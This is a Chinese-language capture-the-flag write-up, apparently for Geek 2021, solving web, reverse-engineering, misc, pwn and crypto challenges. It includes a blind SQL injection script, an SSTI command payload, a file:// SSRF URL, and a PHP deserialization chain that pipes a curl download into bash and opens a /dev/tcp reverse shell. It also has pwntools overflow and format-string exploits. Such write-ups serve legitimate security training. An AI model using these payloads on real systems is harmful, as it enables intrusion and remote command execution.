一年一度。
WEB
0x00 Welcome2021
WELCOME /f1111aaaggg9.php HTTP/1.1 Host: 1.14.102.22:8011 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
0x01 babysql
想用的一个没过滤,好耶~
admin'^1^1#提示:your uname:admin and your pwd:123456
admin'^0^1#提示:wrong username or password
使用admin'^(length(database())=7)^1#判断得知数据库的长度等于7。
爆库名,得到库名为babysql:
import requests
url = r"http://47.100.242.70:4339/index.php"
#admin^(ord(substr(database(),1,1))=199)^1
payload1 = "admin'^(ord(substr(database(),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""
for i in range(1,8):
for j in range(23,123):
payload = payload1+str(i)+payload2+str(j)+payload3
data = {'uname':payload,'pwd':'shaw'}
# print(payload)
s = requests.post(url,data=data).text
if ("admin" in s):
name += chr(j)
print(name)
break
使用admin'^((select(length(group_concat(TABLE_NAME)))from(information_schema.tables)where(table_schema="babysql"))=14)^1# 判断得知,表名的长度等于14,爆表得到jeff,jeffjokes:
payload1 = "admin'^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='babysql'))," payload2 = ",1))=" payload3 = ")^1#"
继续爆列名,首先判断列名jeff的长度,等于23:admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeff"))=23)^1#
判断列名jeffjokes的长度,等于31: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeffjokes"))=31)^1#
不知道哪个 都试试看也没有合适的,感觉自己跑错库了,然后真的跑错库了,哈哈^^:
payload1 = "admin'^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata))," payload2 = ",1))=" payload3 = ")^1#"
修改语句运行得到flag库,找到表名为fllag,列名为fllllllag,长度为22:admin'^((select(length(group_concat(fllllllag)))from(flag.fllag))=22)^1#
最终爆值即可:
import requests
import time
url = r"http://47.100.242.70:4339/index.php"
#admin'^(ord(substr((select(fllllllag)from(fllag)),1,,1))=103)^1#
payload1 = "admin'^(ord(substr((select(fllllllag)from(flag.fllag)),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""
for i in range(1,26):
for j in range(23,130):
payload = payload1+str(i)+payload2+str(j)+payload3
data = {'uname':payload,'pwd':'shaw'}
# print(payload)
s = requests.post(url,data=data).text
if ("admin" in s):
name += chr(j)
print(name)
time.sleep(1)
break
0x02 babyxss
有手有脑,构造就行:
'<script>console.log("'+"<script>alalertert(1)</script>+'");</script>';
0x03 Baby_PHP_Black_Magic_Enlightenment
第一关写入科学计数法即可绕过。
第二关:利用google找到的sha1函数碰撞绕过即可:
a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1& b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
第三关:二次url编码。
0x04 babyPy
SSTI:
{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
0x05 babyphp
访问noobcurl.php,已经提示了flag在根目录,也没有啥限制:
http://47.100.242.70:4659/noobcurl.php?url=file://127.0.0.1/../../../../../../../flag
0x06 蜜雪冰城甜蜜蜜
f12,把id改成9就行。
0x07 babyPOP
题目如下:
<?php
class a {
public static $Do_u_like_JiaRan = false;
public static $Do_u_like_AFKL = false;
}
class b {
private $i_want_2_listen_2_MaoZhongDu;
public function __toString()
{
if (a::$Do_u_like_AFKL) {
return exec($this->i_want_2_listen_2_MaoZhongDu);
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}
class c {
public function __wakeup()
{
a::$Do_u_like_JiaRan = true;
}
}
class d {
public function __invoke()
{
a::$Do_u_like_AFKL = true;
return "关注嘉然," . $this->value;
}
}
class e {
public function __destruct()
{
if (a::$Do_u_like_JiaRan) {
($this->afkl)();
} else {
throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
}
}
}
if (isset($_GET['data'])) {
unserialize(base64_decode($_GET['data']));
} else {
highlight_file(__FILE__);
}
分析得知,类c在反序列化之后立即会a::$Do_u_like_JiaRan = true;
类b中可以执行系统命令,但是有魔术方法__toString(),想要调用就要把其当成字符串使用时触发。
只有类d可以将类b输出,但是调用类d还需要将其调用为函数。
类e可以将类d调用成函数。
但是还需要将类c和其他类进行串联。把类e放入类c中即可。
<?php
class b {
private $i_want_2_listen_2_MaoZhongDu;
public function __construct(){
$this->i_want_2_listen_2_MaoZhongDu='curl http://ip:port/testdel|bash';
}
}
class c {
public $shawroot;
public function __construct(){
$this->shawroot=new e();
}
}
class d {
public $value;
public function __construct(){
$this->value=new b();
}
}
class e {
public $afkl;
public function __construct(){
$this->afkl=new d();
}
}
$data=new c();
echo base64_encode(serialize($data));
?>
公网VPS中,testdel的内容如下,当然让题目curl前还需要开启监听:
bash -i >& /dev/tcp/ip/port 0>&1
REVERSE
0x00 easypyc
用pyinstxtractor.py逆出pyc,再使用uncompyle6工具得到py文件,内容如下:
# uncompyle6 version 3.8.0
# Python bytecode 3.8.0 (3413)
# Decompiled from: Python 3.8.10 (default, Sep 28 2021, 16:10:42)
# [GCC 9.3.0]
# Embedded file name: easypyc.py
whatbox = [
0] * 256
def aaaaaaa(a, b):
k = [
0] * 256
t = 0
for m in range(256):
whatbox[m] = m
k[m] = ord(a[(m % b)])
else:
for i in range(256):
t = (t + whatbox[i] + k[i]) % 256
temp = whatbox[i]
whatbox[i] = whatbox[t]
whatbox[t] = temp
def bbbbbbbbbb(a, b):
q = 0
w = 0
e = 0
for k in range(b):
q = (q + 1) % 256
w = (w + whatbox[q]) % 256
temp = whatbox[q]
whatbox[q] = whatbox[w]
whatbox[w] = temp
e = (whatbox[q] + whatbox[w]) % 256
a[k] = a[k] ^ whatbox[e] ^ 102
def ccccccccc(a, b):
for i in range(b):
a[i] ^= a[((i + 1) % b)]
else:
for j in range(1, b):
a[j] ^= a[(j - 1)]
if __name__ == '__main__':
kkkkkkk = 'Geek2021'
tttttt = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165, 136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]
ssss = input('Please input your flag:')
inp = [0] * len(ssss)
if len(ssss) != 32:
print('Length Error!!!!')
exit(0)
for i in range(len(ssss)):
inp[i] = ord(ssss[i])
else:
aaaaaaa(kkkkkkk, len(kkkkkkk))
bbbbbbbbbb(inp, 32)
ccccccccc(inp, 32)
for m in range(32):
if tttttt[m] != inp[m]:
raise Exception('sorry your flag is wrong')
print('success!!!!!!')
print('your flag is {}'.format(ssss))
然后就麻了,参考这个。
MISC
0x00 这是什么命令
根据题目描述:
cat flag.png | base64 | base64 | tac | nl | sort -k 2 > flag.txt ;rm -f flag.png & nohup php -S 0.0.0.0:2333 >> /dev/null 2>&1 &
访问flag.txt,得到内容如下:
因为贴心的标号序号了,再按数字顺序排列一下就好了。
sort -n -t ' ' -k 1 t.txt > t2.txt
再进行一次tac,解两次Base64得到一张图片即为flag。
0x01 easysend
安装MetaMask,跟着教学走就行。
0x02 easycreat
(1)首先前往Remix:https://remix.ethereum.org
(2)Remix打开后,点击左侧的示例合约“ballot.sol”。
(3)前往Github上示例合约的页面:戳我。
(4)拷贝示例合约的全部代码,替换掉Remix中的合约内容。
(5)点击SOLIDITY COMPILER菜单下的Compile 3_Ballot.sol编译。
(6)点击DEPLOY & RUN TRANSACTIONS菜单下的Deploy进行部署,部署前记得把开发环境改为Injected Web3。
(7)MetaMask会弹出框框。点击确认。
(8)等待生成链接即可。
0x03 每日一溜
过滤http,提取出一张由乃的捧脸图,尾部有zip。打开得到:
vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+/ FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB==
用这个在线自定义base64解码得到flag。
PWN
0x00 恋爱小游戏
连我都要惊呼太简单了的程度,随便输个123就可以了。
0X01 恋爱小游戏2.0
用ida7.5可以自动过混淆,main函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[24]; // [rsp+0h] [rbp-20h] BYREF
char s2[8]; // [rsp+18h] [rbp-8h] BYREF
strcpy(s2, "hateyou");
init(argc, argv, envp);
puts(&s);
read(0, buf, 0x20uLL);
if ( !strcmp(love, s2) )
{
puts(&byte_402074);
system("/bin/sh");
exit(0);
}
puts(&byte_402098);
return 0;
}
让它等于loveyou:
from pwn import *
from struct import pack
elf = ELF('./pwn111')
local = 0
if local == 1:
io = process('./pwn111')
#gdb.attach(io,'b * 0x400A2A')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
io = remote('47.242.20.238',10000)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
payload = 'a'*(0x20-0x8)+'loveyou\x00'+p64(0xdeadbeef)
io.recvuntil("\n")
io.recvuntil("\n")
io.sendline(payload)
io.interactive()
0x02 check in
循环计算200次就可以了,也没有什么难度:
from pwn import *
from struct import pack
elf = ELF('./math')
local = 0
if local == 1:
io = process('./math')
#gdb.attach(io,'b * 0x400A2A')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
io = remote('123.57.230.48',12343)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
for i in range(1,201):
io.recvuntil("num1:")
num1 = io.recvuntil("\n")[:-1]
io.recvuntil("num2:")
num2 = io.recvuntil("\n")[:-1]
io.recvuntil("The sign of this calculation is ")
function = io.recvuntil("\n")[:-1]
calc = str(eval(num1+function+num2))
io.recvuntil("Give me your answer!!:\n")
io.sendline(calc)
io.interactive()
0x03 easyfmt
main函数没有有用的。vuln函数如下:
int vuln()
{
char v1[32]; // [esp+Ch] [ebp-4Ch] BYREF
char format[32]; // [esp+2Ch] [ebp-2Ch] BYREF
int v3; // [esp+4Ch] [ebp-Ch] BYREF
v3 = 666;
puts("First step:");
printf("%p\n", &v3);
__isoc99_scanf("%13s", format);
printf(format);
if ( v3 != 12 )
exit(0);
puts("Second Step");
puts("nice you enter there");
__isoc99_scanf("%20s", v1);
return printf(v1);
}
除了vuln函数外,还存在一个后门函数,所以思路为:首先让v3=0xC满足题目条件,再让return值返回到后门函数上。
第一步要知道第几个参数可控。经测试为第15个字符可控,如图所示:
p32(v3)本身大小为4,再加8即12(0xC)。%8c意思为8个空白字符。
from pwn import *
from LibcSearcher import *
elf = ELF('./format_string')
local = 1
if local == 1:
io = process('./format_string')
#gdb.attach(io,'b * 0x08048634')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
io = remote('node4.buuoj.cn',26933)
libc = ELF('./libc/libc-2.23-0ubuntu11.so')
io.recvuntil("First step:\n")
v3 = int(io.recvuntil("\n",drop=True),16)
log.success('v3: '+hex(v3))
payload = p32(v3)+"%8c%15$n"
io.sendline(payload)
io.interactive()
接下来要让返回地址跳到后门函数。经测试第7个参数可控。
在vuln函数中最后一个printf处下断点,看栈可得知v3距离return到的main函数为0x10(0xac-0x9c):
想让其跳到0x08048793(backdoor),当前为0x804873e,因此更改最后两个字节为93即可。0x93十进制即147,因为p32(v3+10)占了4个字节,所以再加143。更改字节用hhn(n 改int型、ln 改long int型、hn 改word)。最终payload如下:
from pwn import *
from LibcSearcher import *
elf = ELF('./format_string')
local = 0
if local == 1:
io = process('./format_string')
#gdb.attach(io,'b * 0x08048685')
else:
io = remote('123.57.230.48',12342)
libc = ELF('./libc/libc-2.23-0ubuntu11.so')
io.recvuntil("First step:\n")
v3 = int(io.recvuntil("\n",drop=True),16)
log.success('v3: '+hex(v3))
payload1 = p32(v3)+"%8c%15$n"
io.sendline(payload1)
io.recvuntil("there\n")
payload2 = p32(v3+0x10)+"%143c%7$hhn"
io.sendline(payload2)
io.interactive()
CRYPTO
0x00 Classical music
维吉尼亚一把梭,密钥是flag。
0x01 三个也可以
from Crypto.Util.number import getPrime,bytes_to_long from flag import flag flag = bytes_to_long(flag) p = getPrime(100) q = getPrime(100) r = getPrime(100) n = p*q*r e = 65537 c = pow(flag, e, n) print(n) print(c) ''' 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575 '''
使用yafu分解n得到三个素数(没截图^^),(p-1)*(q-1)*(r-1)得:
798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712
求d:
gmpy2.invert(65537,798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712) #得mpz(40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929)
求明文:
#flag = pow(c, d, n) pow(249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575, 40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929, 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807)
得到:
0x5359437b6e6f775f796f755f736f6c76655f69747d
转字符:SYC{now_you_solve_it}
